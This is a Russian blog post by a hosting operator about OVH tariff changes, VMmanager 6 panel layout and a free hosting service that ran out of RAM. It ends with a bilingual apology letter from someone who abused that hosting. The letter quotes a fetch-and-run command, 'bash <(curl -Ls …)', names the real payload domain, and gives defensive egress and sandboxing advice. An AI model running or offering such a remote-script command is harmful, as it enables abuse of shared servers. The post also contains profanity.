ранее он искал хост — в свое время opennet.ru тоже как-то искал хост и я предлагал владельцу opennet ОВХ серверы бесплатно, но он тогда отказался и выбрал inferno



я бы ему тоже предложил бесплатно купить сервак на коло, но он бы отказался из-за гордости скорее всего
т.к. он был из тех кто меня забанил за «честный комментарий о дизайне в платном топике в 2013 году» ) я даже потом сам хотел создать свой роем, т.к. кроме хостинга я так же ежедневно читаю все IT новости и вполне мог бы «выбирать лучшее и модное», но руки так и не дошли, пока что хватает блогов о хостинге чтобы их вести.

кстати я на свои блоги отдаю по 40к месяц


допустим 2010-2014 годы не буду считать, я только в 2011 2012 запускался, плюс я компенсировал «хостинги под блоги» через реферальные ссылки
но вот с 2015 можно посчитать. это 10 лет. 10*12мес*40000р


мне не вломы отдавать из своей прибыли или зар платы деньги на «свой блог»
так же как мне не вломы писать абсолютно бесплатно новости и ставить ссылки на вещи о которых я пишу

это не попытка кого-то задеть или потроллить, просто странно почему он так хочет «бесплатно»
он отдал на Роем гораздо больше сил чем я
и что? жалко стало? настоящим интернетчикам жалко не бывает, они должны работать до самой пенсии пока не умрут за свои идеи и принципы

на самом деле «мне не жалко» и «мне похуй итак все публичное»
но нужно иметь ввиду что сейчас любой сервис прослушивается
просто работать с ними зная об этом факте и все

сначала в 2020-2021 годах я сталкивался как нехватало ОЗУ когда увеличивалось кол-во ВДС или узлов
еще тогда спрашивал в тикете какой сервер нужен под мастер узел в кол-ве озу, но никто тогда не знал, ведь тестов не производилось (лень искать я выкладывал тикет даже сотрудника)

потом в 2022 я наблюдал несколько крупных миграций из ВМ-5 на ВМ-6
в 2023 2024 наблюдал хорошие показатели роста
тогда применялись серверы уже под мастер ноды на 256 озу на всякий случай
в принципе ISP что-то в эти годы тоже оптимизировали множество раз поэтому случаи из 2020 года уже могли и не повторяться с утечками озу
скорее росла лишь нагрузка на процессор и интернет канал, когда мастер нода общается с узлами — уже нужны были более чем 1 гигабит канал, но потом и там тоже оптимизировали и 1 гига в принципе хватает в современное время уже.

в 2025 столкнулись с блокировками РНК когда связность пропадала если мастер панель в европе, а узлы в рф
и наоборот если мастер панель в РФ, а узлы в европе

так что стало понятно что идея «делать 1 ПУ для всего мира» — явно провальная идея.
сама идея VMmanager 6 как задумка чтобы больше не плодить кучу панелей как было на ВМ-5 — задумка столкнулась с реальностью и разбилась о жестокость политических и государственных фактов, которые мешают людям честно работать.

я уже в 2020 в принципе начал делать кучу разных ВМ-6
но это потому что я такой человек который никогда не держит все в одной корзине
но чем больше лет шло тем сильнее мой архитектурный подход оказывался все стабильнее и стабильнее

и вот сейчас в 2025 абсолютно и точка — доказано что нужно делать много ПУ короче


даю совет всем новичкам
самый лучший вариант это делать именно 1 ПУ — 1 GEO — например 1 ПУ для конкретного дата-центра, если у вас более 200 узлов будет или более 30000 вдс
если же у вас 1 стойка всего и роста не будет, можно делать 1 ПУ для 1 страны, а уже дата-центры делать как кластеры и делать так
если же у вас вообще не планируется рост выше 1 стойки, то можно и по континентам поделить, ресурсного запаса ПУ ВМ-6 вам хватит для такого деления.
но на вырост «среднего хостинга» — ПУ не справляется

на ВМ-5 мы делили панели по процессорам внутри разных GEO. тогда я считал что ВДС-ки будут расти так же быстро, как дедики ОВХ — тысячами за год. поэтому сразу покупал ПУ на запас скажем так. Но оказалось что ВДС-ки и Дедики это абсолютно разные услуги (в 2017 я только учился делать ВМ, а в мир продаж я зашел сразу с дедиков же). В итоге те панели ВМ-5 получилось, что максимум может 10-20-50 узлов набирали, ни о каких там сотнях и тысячах речи и быть не могло. Хотя на радостях начала продаж я планировал именно сотнями уплотнять узлы по полочкам в красоту через кучу технических доменов. Только дедики могли продаваться сразу сотнями, ибо это разные аудитории, собрать ВМ-ки гораздо сложнее чем найти крупного клиента на дедики. Поэтому та задумка красивого деления по «процессорам» — тоже провалилась, зато я получил десятки панелей за которые потом ежемесячно отдавал бабки на «серверы под ПУ». Это был интересный опыт короче. В принципе оглядываясь на 8 лет назад, скорее всего дело было в ВМ-5 которая очень плохо тогда автоматически выдавала ВМки, ведь нада было настраивать IPmanager, поэтому тогда и не получилось сотнями. Так как уже в 2023 я видел кейсы когда один человек покупает 3000 виртуалок за раз, но это уже работало на ВМ-6. А сейчас я бы сказал если соблюдается условие "современности", то виртуалки тоже могут разлетаться как дедики в кол-ве, если это не слабые виртуалки, а мощные виртуалки.

Сейчас на ВМ-6
Вкладка Кластеры — это не способ деления услуг по "geo странам"
Вкладка Кластеры это способ деления по дата-центрам внутри какой-то страны или даже внутри одного города local-geo
Вкладка Кластеры это способ деления услуг по процессорам и моделям под разные тарифы
Вкладка Кластеры это способ деления услуг по надежности и отказоустойчивости (хотя это 50/50, я бы под отказоустойчивость все равно сделал отдельную ПУ ВМ-6 чтобы избежать точки отказа через мастер узел, в том числе)
Именно так самое разумное и оптимальное решение получается

А вот GEO по всему миру и разные страны — нужно делать абсолютно разные ВМ-6 панели.
А потом так же каждую страну уже обрабатывать и делить внутри страны сервисы и услуги через категорию сортировки — кластеры

короче ОВХ отменило плату за установку
отменило подписку на 1-2 года обязательства, уже писал

сбросила везде по 10-20-30 евро в зависимости от тарифа
НО так же создала и 32 озу тарифы, там где их не было и были только 64 озу тарифы, притом цена 64 перекочевала на 32, а 64 стали дороже ) я так понимаю у них просто на складах остались плашки всякие и они их решили тоже утилизировать вместе с тем же железом, которое уже больше не закупается

так же произошли изменения в каналах
100 мегабит менялось на 300 мегабит, а потом и на 500
250 менялось на 500, а потом и на 1 гигабит
1 гиг менялся на 3 гига сразу
плюс на всех конфигах появилась возможность докупить 2 гига 3 гига или более свежие тарифы до 5 гиг до 10 гиг
так же появились тарифы с 50 гигами локальной сети в комплекте

вообще ход на 3 гигабита — у них вышел удачный
я уже писал что 100г продал буквально за вечер

1 гиг — уже никого особо не удивляло
3 гига — уже смотрится современно для 2025 года, ДАЖЕ ПРИ УСЛОВИИ что мне это не нужно, но чисто психологически смотрится уже ИНАЧЕ

и вот даже например обычный блоггер типо меня, если захочет «обновить свои серверы» которые не обновлял с 2018 года под блоги.
да, там нагрузки на трафик нету и даже 100 мегабит за глаза
НО человек хочет для своего любимого блога хороший сервер и как-то менять 500 мегабит на 1 гиг и потом еще «10 лет пока не сгорит» не охота
вот я сейчас склоняюсь к тому, что лучше я заплачу за более дорогие серваки, да за 10 лет я отдам больше денег, но все же лучше куплю 32 озу из линейки где дается 3 гига в комплекте. зачем? просто так на будущее, может пригодится.

так что чисто потребительский эффект новизны
считаю с выходом 3 гигабитных серверов — у них удался на 100%

что такое подписка?
это когда предлагалось согласиться на услугу на оплату на 1 год или 2 года, но получить
1. получить бесплатную установку
2. какую-то скидку. сначала там были шикарные скидки. но потом каждый год они падали и упали до жалких 5% которые уже почти ничего не экономили, а риск «остаться с продлением на 2 лет» был велик
по началу шел шикарный спрос(как оказалось из-за бага) и Олес даже хотел сделать на 5 лет подписку, но так и не сделал

подписка появилась в 2020
5 лет назад
и похоже концепция такой услуги себя не оправдала

не буду говорить согласен ли я с тем, что это был полный провал или не согласен
ХУЙ знает, мое мнение — были и плюсы и минусы

просто расскажу факты истории

с подпиской можно было продавать по разным ценам


в начале когда эту подписку ввели
она была баговая
короче можно было заказывать по подписке БЕЗ УСТАНОВКИ и просто не продлять сервер и он отключался как обычный сервер и удалялся
год или пару — реселлеры так продавали «дешевле чем у ОВХ»

потом сотрудники начали портить жизнь таким читерам
и стали переводить аккаунты на принудительное авто-продление чтобы серверы не отключались
тогда что стали делать реселлеры?
они стали выкидывать такие «подписочные» серверы в пустые аккаунты где сервер продлялся в минус и потом удалялся
короче стали выкидывать на мусорные аккаунты

тогда что сотрудники сделали?
они запретили возможность переносить серверы, если на них была подписка
да, тут сразу началось попадалово, в течение 2х летней подписке шанс что клиент откажется от сервера — 90%
но считаю это был честный обмен, сначала клиенты попытались через баги сэкономить и потом баги починились и где-то пришлось продлять серверы в пустую и потерять деньги. никто не в обиде, как говорится «сам виноват».

НО я думаю подписку удалили не из-за того, что они заебались воевать с читерами
а потому что пришло ДОЛГОЖДАННОЕ крутое обновление тарифов. в 2024 году ОВХ снова стало делать крутые обновления и подниматься.
и вот весь народ — захотел обновиться на новые серверы
а у них допустим — подписка
и что?
кому приятно сидеть и целых 2 года продлять ПО СТАРОЙ цене сервер, который НОВЫЙ можно купить в 2 раза дешевле
все начали ныть наверно как отменить эту ебучую подписку
потому что подписка портила мораль. вот есть довольный клиент, который любит новинки ОВХ и он видит новые тарифы — и он хочет на радостях попробовать новые тарифы. но подписка заставляет его грустно продлять говно и мораль портится, клиент не может попробовать новинку, а так же еще чувствует что тратит деньги на мусор столетний.
думаю именно это и послужило триггером к отмене подобной хуйни в принципе на всех тарифах

итого что можно сказать?
подписка как средство экономии — это хороший метод рекламы
но только если компания не планирует обновлять свои тарифные планы лет 10
а если вы являетесь современной компанией идущей в ногу со временем, то подобные подписки хуйня обыкновенная, потому что в современных компаниях люди постоянно каждый год, каждые 2 года покупают «новинки» и обновляются.
бывают конечно специфичные задачи типо на 10-15 лет пока не сгорит. и даже старый сервер не хочется в таком случае обновлять. НО как обычно случается? этот самый тот же самый старый сервер начинает стоить в 2 раза дешевле. и просто грустно смотреть, как ты оплачиваешь старый заказ, пусть и нужный заказ который ты так или иначе хочешь продлять 15 лет, но грустно смотреть как ты эти 15 лет продляешь по старой цене, когда видишь на прилавке тот же самый товар по новой цене в два раза дешевле. и поэтому даже тот, кто не планировал обновлять сервер, из-за всяких вечных изменений цены — начинает хотеть поменять старый на новый.

Но селектел похоже считает что незачем держать 2 точки входа при заказе

Когда в 2021 сгорел SBG2
Он заявил



Но шли годы — ничего этого не происходило
Я даже как-то иронизировал


Но на новой линейке
Которая уже ДВАЖДЫ разлетелась как пирожки
hosting.show/alice2k-hosting/na-etom-fone-ekzemplyary-do-linode-vultr-stoimostyu-5-vyglyadyat-ustarevshimi-s.html
hosting.show/alice2k-hosting/o-vizhu-v-evrope-poyavitsya-gpu-a-to-tolko-v-rf-bylo-raznoobrazie.html



Бекапы в ОВХ действительно стали БЕСПЛАТНЫ

начало
hosting.show/alice2k-hosting/dlya-kitaycev-nuzhno-sobirat-1-tb-ozu-servery-pohozhe-no-k-sozhaleniyu-takih-staryh-i-nenuzhnyh-poka-esche-net-no-v-2030-budut.html


Сайтов на питоне нет — я все удалил
Нет не одного питон процесса в списке процессов
Но увы — не удаляется.







Короче 1 процесс жрет 60 мб
1 ТБ озу сервер это 1000000 мб
/ 16000 процессов
допустим по 5 процессов на человека
16000/5 = 3200 аккаунтов

И это кстати хороший пример того что означает «слабый хостинг».
Вот я писал много раз про слабые облака или что-ниб еще.
Пришел наплыв заказов — продукт не справился. Так как там было 32 озу 128 озу и 16 озу и 16 озу всего лишь 4 сервера бомжа, для бесплатного то хостинга.
Но любой нормальный хостинг, например таймвеб или регру которые считают себя лидерами должен в запасе иметь думаю около 10 ТБ озу чтобы в случае чего не опозориться.
Тоже самое с ВДС я писал уже ранее

Я конечно своим проебом это не считаю — так как услугу бесплатного хостинга я и не планировал масштабировать. Но если бы я серьезно задумался сделать «хостинг сайтов» то только 10 ТБ озу запаса — только так.

кстати идею с каталогом Авито мне так никто и не реализовал
а ведь если бы существовал такой специальный сайт каталог — железо б/у разлеталось бы как пирожки

начало интересного случая с дырявой ISPmanager
hosting.show/alice2k-hosting/dlya-kitaycev-nuzhno-sobirat-1-tb-ozu-servery-pohozhe-no-k-sozhaleniyu-takih-staryh-i-nenuzhnyh-poka-esche-net-no-v-2030-budut.html

I am writing to take full responsibility for the recent wave of service abuse that has impacted your platform. I am the person who initiated this situation.

Initially, I discovered a method that allowed for arbitrary command execution using Python on your servers. Without considering the potential consequences, I shared this finding within an online community. I severely underestimated the impact this would have, and I never intended for it to lead to widespread malicious activity.

To mitigate any further damage, I have now deleted all the content I posted regarding this method. I want to express my deepest and most sincere apologies for the significant disruption and trouble this has caused.

In an effort to help you secure your platform and make amends, I am providing a detailed analysis of the exploit and a set of actionable recommendations to block this and similar attacks in the future.

Technical Analysis and Recommendations

The attack relies on the ability to download and execute a remote shell script from within a user’s process. The core command being used is: bash <(curl -Ls [REMOTE_SCRIPT_URL]).

Here are several layered defense strategies to prevent this:

Immediate Mitigation: Network Egress Filtering

This is the fastest way to stop the current attack.

Action:
Block Specific Domain: Use your firewall to block all outbound traffic to the domain main.ssss.nyc.mn.
Default Deny Policy (Best Practice): Block all outbound internet access by default and only whitelist essential domains. This prevents attackers from simply moving their script to a new domain.

Core Solution: Restrict the Execution Environment

This is the fundamental, long-term solution.

Action:
Disable Dangerous Functions: In your Python environment, disable dangerous modules like subprocess, os.system, os.popen, etc.
Use Secure Sandboxing: Run user code within a heavily restricted sandbox (e.g., Docker with strict seccomp and AppArmor/SELinux profiles, or technologies like gVisor). The process should run as a low-privilege, non-root user.

Detection and Monitoring

This allows you to detect and respond to threats in real-time.

Action:
Monitor Process Creation: Log and alert whenever a user’s process spawns a shell or network utility (e.g., /bin/bash, curl, wget).
Monitor Network Connections: Log all outbound connections and alert on traffic to suspicious or unknown destinations.

Summary of Recommendations

Strategy: 1. Network Filtering
Implementation Method: Firewall rules to block specific outbound domains/IPs.
Impact: Immediate. Stops the current attack vector.

Strategy: 2. Environment Hardening
Implementation Method: Disable dangerous functions, use sandboxing (Docker, gVisor).
Impact: Strategic. The most robust long-term solution.

Strategy: 3. Detection & Monitoring
Implementation Method: Log and alert on suspicious process/network activity.
Impact: Proactive. Provides visibility for rapid response.

I once again apologize for my irresponsible actions. I hope this technical information is useful for your team and helps you strengthen your platform’s security.

Sincerely,

Я пишу, чтобы взять на себя полную ответственность за недавнюю волну злоупотреблений сервисами, которая затронула вашу платформу. Я являюсь лицом, инициировавшим эту ситуацию.

Изначально я обнаружил метод, позволяющий выполнять произвольные команды с использованием Python на ваших серверах. Не оценивая возможные последствия, я поделился этим открытием в онлайн-сообществе. Я сильно недооценил последствия этого и никогда не подразумевал, что это приведет к широкому распространению вредоносной активности.

Чтобы минимизировать дальнейший ущерб, я удалил весь опубликованный мной контент, касающийся этого метода. Хочу принести свои глубочайшие и самые искренние извинения за значительные сбои и проблемы, которые это вызвало.

Чтобы помочь вам защитить вашу платформу и исправить ситуацию, я предоставляю подробный анализ эксплойта и набор практических рекомендаций по блокированию этой и подобных атак в будущем.

Технический анализ и рекомендации

Атака основана на возможности загрузки и выполнения удаленного скрипта оболочки из процесса пользователя. Основная используемая команда: bash <(curl -Ls [URL_УДАЛЁННОГО_СКРИПТ]).

Вот несколько многоуровневых стратегий защиты для предотвращения этого:

Немедленное смягчение: Фильтрация исходящего сетевого трафика

Это самый быстрый способ остановить текущую атаку.

Действие:
Блокировка определённого домена: Используйте брандмауэр для блокировки всего исходящего трафика в домен main.ssss.nyc.mn.
Политика запрета по умолчанию (рекомендуемая практика): Блокируйте весь исходящий интернет-доступ по умолчанию и добавляйте в белый список только необходимые домены. Это не позволит злоумышленникам просто перенести свой скрипт в новый домен.

Основное решение: Ограничьте среду выполнения

Это фундаментальное долгосрочное решение.

Действие:
Отключите опасные функции: В вашей среде Python отключите опасные модули, такие как subprocess, os.system, os.popen и т. д.
Используйте безопасную песочницу: запускайте пользовательский код в строго ограниченной песочнице (например, Docker со строгими профилями seccomp и AppArmor/SELinux, или такими технологиями, как gVisor). Процесс должен запускаться от имени пользователя с низкими привилегиями, не являющегося пользователем root.

Обнаружение и мониторинг

Это позволяет обнаруживать угрозы и реагировать на них в режиме реального времени.

Действие:
Мониторинг создания процессов: регистрируйте и оповещайте о каждом запуске пользовательским процессом оболочки или сетевой утилиты (например, /bin/bash, curl, wget).

Мониторинг сетевых подключений: регистрируйте все исходящие соединения и оповещайте о трафике, направленном на подозрительные или неизвестные адреса.

Резюме рекомендаций

Стратегия: 1. Фильтрация сети
Метод реализации: правила брандмауэра для блокировки определенных исходящих доменов/IP-адресов.
Воздействие: немедленное. Блокирует текущий вектор атаки.

Стратегия: 2. Укрепление среды
Метод реализации: Отключение опасных функций, использование изолированной среды (Docker, gVisor).
Воздействие: Стратегическое. Наиболее надёжное долгосрочное решение.

Стратегия: 3. Обнаружение и мониторинг
Метод реализации: Регистрация и оповещение о подозрительной активности процесса/сети.
Воздействие: Проактивное. Обеспечивает прозрачность для быстрого реагирования.

Ещё раз прошу прощения за свои безответственные действия. Надеюсь, эта техническая информация будет полезна вашей команде и поможет вам укрепить безопасность вашей платформы.

С уважением,